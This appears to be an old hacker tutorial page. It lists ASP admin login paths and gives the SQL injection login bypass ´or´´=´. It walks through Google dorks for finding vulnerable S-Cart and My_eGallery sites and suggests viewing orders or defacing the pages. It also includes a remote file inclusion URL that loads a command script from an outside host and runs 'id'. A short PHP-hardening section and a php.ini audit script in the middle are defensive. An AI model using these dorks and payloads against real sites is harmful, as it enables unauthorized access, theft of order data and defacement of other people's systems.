DORK SQL INJECTION WEB ATTACK
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
"root/login.asp"
"admin/index.asp"
Log in with:
Community ID:´or´´=´
Password:´or´´=´
Bug file: admin page --> /admin
Display: http://target.com/s-cart/admin
1. Search in any search engine, e.g. --> allinurl:s-cart/index.phtml or "s-cart"
2. Get the target site, like --> http://www.target.com/s-cart/index.phtml
3. Now go to the admin page by changing the URL to:
http://www.target.com/s-cart/admin --> the browser automatically opens a login and password prompt !!!
login : admin
passwd : ´or´´=´
4. If you are lucky, you can see the admin manager, show the Order table now, or deface the s-cart page.
OK, let's try :P~
Secure PHP
How to secure PHP
1. Open php.ini (find for yourself where it is located).
2. Find the safe_mode setting (the default value is off) and set it to =on.
3. Turn off dangerous functions like passthru, system, exec
by adding the function names to disable_functions=
4. The easy and more secure way --> use plain HTML, not PHP :)
5. Watch the permissions on directories and files.
Note:
These functions are better turned off:
1. passthru, system, exec, myshellexec <-- PHP command shell
2. fopen <-- can execute a remote file
3. fwrite, fputs <-- write files
4. phpinfo <-- shows PHP data
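A way to check a php.ini against the steps above, as an added example that is not part of the original page. The required function list is taken from the note above; the allow_url_fopen and allow_url_include checks, the sample ini text and all names in the code are assumptions made for illustration.

```python
# Added example (not from the original page): audit php.ini contents.
# safe_mode is not checked because PHP 5.4.0 removed that directive.
# Functions named on the page that this check requires in disable_functions.
REQUIRED_DISABLED = {"passthru", "system", "exec", "phpinfo"}
# Directive -> PHP's built-in default when php.ini does not set it.
# This check wants both off so a URL passed as an include path is refused.
URL_DIRECTIVES = {"allow_url_fopen": "1", "allow_url_include": "0"}
TRUTHY = {"1", "on", "yes", "true"}

# Constructed sample inputs, not taken from any real server.
SAMPLE_WEAK = """[PHP]
; constructed sample
disable_functions = passthru, system
allow_url_include = On
"""
SAMPLE_HARDENED = """[PHP]
disable_functions = passthru,system,exec,phpinfo
allow_url_fopen = Off
allow_url_include = Off
"""


def parse_ini(text):
    """Return {directive: value}; a later assignment overrides an earlier one."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()  # drop ';' comments
        if line.startswith("[") or "=" not in line:
            continue  # section header, blank line, or not an assignment
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit(text):
    """Return a sorted list of findings for the given php.ini contents."""
    s = parse_ini(text)
    listed = s.get("disable_functions", "").lower().split(",")
    disabled = {name.strip() for name in listed if name.strip()}
    findings = [f"disable_functions is missing {fn}"
                for fn in REQUIRED_DISABLED - disabled]
    findings += [f"{key} is enabled" for key, default in URL_DIRECTIVES.items()
                 if s.get(key, default).lower() in TRUTHY]
    return sorted(findings)


if __name__ == "__main__":
    for name, ini in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(name, audit(ini) or "no findings")
```

The parser treats every `;` as the start of a comment, which is enough for these directives but not for values that contain a quoted semicolon.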
Hacking concept:
http://[VICTIM]/mail_autocheck.php?pm_path=http://www.webloe.com/phpinjection.txt?&cmd=id
Target sites can be found with a search engine like Google.
For example, we can use the keyword inurl or allinurl:
allinurl:/mail_autocheck.php?pm_path=*.*
A sample PHP injection script you can upload to your website
------------------END HERE---------------------------
##############################################
My_eGallery security exploit
Author : scariot shall live for ever
##############################################
Bug file may be: displayCategory.php
Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php
Note:
To attack you must use this script; save it and upload it to your website.
e.g. save with the file name: cmd.txt
e.g. from my site: http://www.geocities.com/seng_due/script/solohackerlink.txt